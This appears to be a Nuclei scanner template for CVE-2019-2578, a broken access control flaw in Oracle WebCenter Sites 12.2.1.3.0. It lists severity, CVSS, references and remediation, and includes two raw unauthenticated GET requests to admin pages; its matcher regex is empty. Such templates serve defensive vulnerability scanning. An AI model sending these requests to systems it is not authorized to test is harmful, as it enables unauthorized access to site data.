id: CVE-2019-2578 info: name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control author: leovalcante severity: high description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. impact: | Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578). reference: - https://www.oracle.com/security-alerts/cpuapr2019.html - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://nvd.nist.gov/vuln/detail/CVE-2019-2578 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2019-2578 epss-score: 0.00751 epss-percentile: 0.78961 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: webcenter_sites tags: cve,cve2019,oracle,wcs,auth-bypass http: - raw: - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 Host: {{Hostname}} - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers: - type: regex part: body regex: - '' # digest: 4a0a00473045022100b9940e71238dfed04accb769ead7740b09ac54d79d9705c29ae4a67c6f13fa58022030cb1aa51c23ebad945ac7819108ca4230f7026bab6badab3d03b4425554c9f8:922c64590222798bb761d5b6d8e72950